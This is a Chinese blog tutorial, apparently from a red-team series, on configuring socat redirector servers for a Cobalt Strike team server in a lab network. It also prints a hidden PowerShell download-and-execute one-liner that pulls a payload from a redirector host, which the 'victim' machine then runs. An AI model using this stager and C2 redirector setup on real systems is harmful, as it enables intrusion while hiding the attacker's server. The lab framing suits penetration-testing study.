内网渗透神器CobaltStrike之重定向服务配置(二)

已于 2023-08-21 21:35:39 修改
阅读量862 收藏 2
点赞数
分类专栏: 红队的自我修养 文章标签: 渗透测试 kali 安全 web安全 系统安全
于 2022-11-18 15:41:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/127923969
版权

重定向服务的概念

"重定向"是一个在CS服务器与目标主机进行网络传输之间的服务器, 不仅能保护CS服务器, 还能增强与目标网络传输的稳定性, 例如某一台重定向服务器倒塌了, 但是CS服务器还是能通过其他重定向服务器与目标网络进行信息传输


环境拓扑

  • 域名: team.com
  • Dns服务器: 192.168.47.137
  • CS团队服务器: 192.168.47.134(cs.team.com)
  • 重定向服务器1: 192.168.47.131(proxy1.team.com)
  • 重定向服务器2: 192.168.47.140(proxy2.team.com)
  • 目标主机: 192.168.47.141

1


环境搭建

1.在域控为CS服务器及代理服务器配置域名

在域控服务器打开DNS管理器

1


在DNS的正向查找区域新建一个区域, 名为team.com, 即相当于申请一个顶级域名

动画


为新建的区域增添A记录, 如下图所示步骤依次添加CS服务器及代理服务器

  • CS服务器: 别名为team, ip地址为192.168.47.134

  • 代理服务器1: 别名为proxy1, ip地址为192.168.47.131

  • 代理服务器2: 别名为proxy2, ip地址为192.168.47.140

2

1


2.将代理服务器80端口的数据转发到CS服务器80端口上

使用socat命令进行端口转发, 若没有此命令需先使用apt-get install -y socat命令进行安装, socat命令使用语法如下:

socat TCP4-LISTEN:80,fork TCP4:[server ip]:80

将本机80端口监听到的数据转发到server服务器上的80端口


在两台代理服务器(ubuntu0和ubuntu1)上输入: socat TCP4-LISTEN:80,fork TCP4:192.168.47.134:80

动画


攻击步骤

1.在CS客户端创建监听并生成攻击payload

在域内windows7主机登录CS客户端

3


新建http监听80端口, 将代理的服务器域名填写至HTTP Hosts

3


生成Power Shell远程执行代码: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://proxy1.team.com:80/a'))"

动画


浏览器访问http://proxy1.team.com:80/ahttp://proxy2.team.com:80/a, 查看是否有返回结果, 若有则表示攻击payload配置成功

image-20221001230039340


通过查看web日志可以查询到访问域名者的详细信息

image-20221001230512699


2.受害机执行PowerShell恶意代码

在受害机执行powershell恶意代码: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://proxy1.team.com:80/a'))"后, 受害机在CS客户端界面显示上线

1


受害机抓包分析

使用Wireshark抓取HTTP数据包进行分析, 受害机的ip地址为192.168.47.141, 它向192.168.47.140(proxy2.team.com)发http数据包, 随后192.168.47.140192.168.47.134(cs.team.com)发http数据包, 除此之外受害机还向192.168.47.131(proxy1.team.com)发了http数据包

image-20221002004235260

Henry404s
关注
专栏目录
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-30 7503
cobaltstrike之cs上线获取shell
渗透测试神器CobaltStrike基本使用教程
大河之犬的博客
05-09 2533
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作CS集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等特性为一体钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。
服务器端重定向
慕北丶
03-25 3564
文章目录服务重定向客户端转发观察客户端转发总结 服务重定向 服务重定向又叫做服务器端转发(跳转),客户端发送一次请求之后,却在服务器端做了多次转发(重定向),但是最终对于客户端来说就是发送一次请求,可以在服务器端使用==req.getRequestDispatcher(“转发路径”).forward(req,resp)==实现服务器端转发 客户端转发 客户端转发就是每次进行的转发都是客户端的...
Cobalt Stike使用重定器
yyj1781572的博客
11-16 351
Cobalt Stike使用重定器
【技巧】公网搭建cobalt strike
qinjilll的博客
09-14 1198
Cobalt Strike 是一款用于渗透测试和红队作业的神器,它分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。它由Rafal Los开发,并随着红队作业需求的增长成为主流工具之一。Cobalt Strike 通过可视化界面和功能强大的后渗透模块,使得攻击者能够更容易地管理和控制目标系统。
Cobalt Strike)使用重定器
qq_56426046的博客
09-17 372
重定器”是一个在“cobalt strike服务器和目标网络之间的服务器。这个“重定器”的作用是对你团队服务器下的连接,进行任意的连接或返回。(注:即通常说的代理服务器或端口转发工具)“重定器”服务(在攻击和防御中)是很重要的角色。第一保护服务器地址,并作为攻击者,它也是一个很好的安全操作。第 它给予了一些很好的适应能力 假如你们的工具中有一两个堵塞了没有大不了的,也可以进行通信。
Nginx重定向配置
qq_38472635的博客
06-16 1735
简介 重定向(Redirect)就是通过各种方法将各种网络请求重新定个方向转到其它位置 我们在网站建设中,时常会遇到需要网页重定向的情况: 1.网站调整(如改变网页目录结构); 2.网页被移到一个新地址; 3.网页扩展名改变(如应用需要把.php改成.Html或.shtml)。 这种情况下,如果不做重定向,则用户收藏夹或搜索引擎数据库中旧地址只能让访问客户得到一个404页面错误信息,访问流量白白丧失;再者某些注册了多个域名的网站,也需要通过重定向让访问这些域名的用户自动跳转到主站点等常用的重定向方式 30
内网渗透攻防实战大作业 - Cobalt Strike木马攻击与横向移动详解
最新发布
10-18
内容概要:本文档是北京北大方正软件职业技术学院2023-2024学年第学期《内网渗透攻防》课程的大作业试卷B卷,主要考核学生对木马攻击及横向移动技术的理解与实际操作能力。文档详细列出了考试的内容、标准及评分...
Cobalt Strike内网渗透
qq_49694748的博客
01-05 3809
1、端口扫描portscan 2、socket4a代理 3、内网渗透-端口转发 4、内网渗透-bind反弹shell 5、密码抓取hashdump logonpasswords 6、提权elevate 7、进程管理 8、进程注入inject 9、屏幕监控desktop 10、键盘记录keylogger 实验拓扑: 端口扫描 portscan 192.168.2.0/24 1-1000对网段存活的主机进行存活扫描和端口扫描,可以用于内网扫描 或者图形化界面 右...
内网神器cobaltstrike使用教程
hackzkaq的博客
11-17 7928
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一、安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver.bat teamserver.bat 1.1.1.1 123456 linux 需要有足够权限,可以通过chmod +x teamserver 来提高权限 ./tea
Cobalt Strike配置
m0_66993332的博客
05-19 534
Cobalt Strike配置
转发重定向配置
IT_private的博客
07-03 200
页面跳转的方式1、转发2、重定向3、转发到自己的Action<result name="success" type="chain">    <!--跳转到下一个action的action的名字-->    <paramname="actionName">targetAction</param>    <!--跳转到下一个ac
nginx 公安内网 跳转与重定向,try_files 试验
a5601564的博客
01-17 835
#user  nobody; worker_processes  1; #error_log  logs/error.log; #error_log  logs/error.log  notice; #error_log  logs/error.log  info; #pid        logs/nginx.pid; events {     worker_connections  ...
突破网关,利用端口重定向进入内网
似羽尤凌
11-25 1078
突破网关,利用端口重定向进入内网 --------------------------------------------------------------------------------www.hackbase.com 阅读: 时间:2005-6-13 3:05:24 来源:www.77169.org  经常有人问我这个问题“怎样进入内网”,怎么回答呢,归纳起来就是一句话“突破网关,利用端
CobaltStrike的安装配置及使用,实现office钓鱼
bwxzdjn的博客
04-18 4246
渗透测试软件Cobalt Strike的安装和使用,以及利用其进行office钓鱼。
突破网关进入内网 巧妙利用端口重定向
风信子的专栏
01-15 860
经常有人问我这个问题“怎样进入内网”,怎么回答呢,归纳起来就是一句话“突破网关,利用端口重定向进入内网”。 首选要突破网关(GetWay),这很容易理解,因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。  突破网关以后,我们的目标就是通过网关(IP为202.98.*.*)上网的 192.168.21.75。以后
【随笔】转发/转向(服务重定向服务器转发,服务器跳转)和重定向(客户端重定向,客户端转发,客户端跳转)
北极星的博客
04-25 952
(2)服务器端跳转时,JSP执行到跳转语句时会立刻进行跳转,不再执行之后的代码;(1)服务器端跳转时,未超出request的属性范围,request属性能够保存到跳转页;客户端跳转时,则超出了request的属性范围,无法进行其属性的传递。(web应用的根目录指定是项目里的webcontent下的目录,站点根目录指的是http://localhost:8080/后的目录)重定向:A找B要钱,B没钱,于是B将C的联系方式告诉A,然后A再向C借钱。转发:A找B要钱,B没钱,于是B向C借钱,然后将钱给A。
Cobalt Strike 结合Nginx
m0_59119089的博客
08-03 933
Cobalt Strike 结合Nginx做反向代理 1. 概述 最近在折腾CobaltStrike 考虑的太多为了C2的隐蔽性 不被扫。索性做个反向代理,做一下流量过滤。 网上大概找了找 来来去去 就一篇文章。 索性自己折腾实践一下。 此处使用的 payload 为http (https没成功 正在研究中。。。 大佬有知道的指点一下 谢谢) 2. 准备 1 安装 Nginx 根据各自需求 apt install nginx #debain 系列 yum install nginx
Cobalt Strike 4.5 新功能:中英版本快速切换插件
2. 内置插件:作为一款内网渗透神器Cobalt Strike 4.5不仅集成了多种实用的内置插件,这些插件增强了软件在攻击向量选择、数据窃取、网络侦察等方面的能力。用户通过这些插件可以更加高效地开展渗透测试工作,同时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值